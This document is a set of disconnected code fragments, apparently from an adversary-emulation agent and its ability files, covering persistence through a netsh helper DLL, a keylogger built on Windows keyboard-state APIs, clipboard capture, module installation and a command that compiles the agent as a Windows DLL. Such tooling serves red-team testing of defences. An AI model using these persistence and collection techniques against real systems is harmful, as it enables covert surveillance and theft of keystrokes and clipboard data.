```yaml
platforms:
  windows:
    exec:
      command: 'netsh.exe add helper #{agent.location}\..\netShHelperDll.dll'
      payload: '#{operator.payloads}/persistence/netsh/netShHelperDll.dll'
    cmd:
      command: 'netsh.exe add helper #{agent.location}\..\netShHelperDll.dll'
      payload: '#{operator.payloads}/persistence/netsh/netShHelperDll.dll'
```
```go
var (
	user32            = syscall.NewLazyDLL("user32.dll")
	getAsyncKeyState  = user32.NewProc("GetAsyncKeyState")
	getKeyboardLayout = user32.NewProc("GetKeyboardLayout")
	getKeyState       = user32.NewProc("GetKeyState")
	toUnicodeEx       = user32.NewProc("ToUnicodeEx")
)
```
```yaml
platforms:
  windows:
    keyword:
      command: module.collect.keyLogger
      payload: "#{operator.payloads}/pneumaEX/collect/collect-windows.exe"
```
```go
if executor == "keyword" {
	task := splitMessage(message, '.')
	if task[0] == "module" {
		var err error
		if !contains(util.InstalledModuleKeywords, task[1]+"."+task[2]) {
			err = util.InstallModule(task[1], payloadPath)
		}
		if err != nil {
			return err.Error(), 1, -1
		}
```
```go
if executor == "keyword" {
	task := splitMessage(message, '.')
	if task[0] == "api" {
		return CallNativeAPI(task[1])
	} else if task[0] == "config" {
		return updateConfiguration(task[1], agent)
	}
	return "Keyword selected not available for agent", 0, 0
}
```
```go
// +build !windows

package commands

func CallNativeAPI(task string) (string, int, int) {
	return "Not implemented for non-Windows platforms", 1, -1
}
```
```go
package commands

import (
	"encoding/json"
	"log"
	"os"
	"syscall"
	"unsafe"
)
```
```go
// +build cgo

package main

import "C"
import (
	"flag"
	"github.com/preludeorg/pneuma/sockets"
	"github.com/preludeorg/pneuma/util"
	"log"
```
```sh
GOOS=windows CC=x86_64-w64-mingw32-gcc CGO_ENABLED=1 go build --buildmode=c-shared --ldflags='-s -w -X main.key="MYKEYISBESTKEY" -extldflags "-Wl,--nxcompat -Wl,--dynamicbase -Wl,--high-entropy-va"' -o payloads/pneuma.dll main.go;
```
```yaml
id: 2897b095-3356-456f-876c-3103f91352ab
metadata:
  version: 1
  authors:
    - khyberspache
  tags:
    - thinktank
name: Capture clipboard using a module
description: |
  Installs a user-land clipboard capture binary and collects the clipboard every 30 seconds for 10 minutes.
```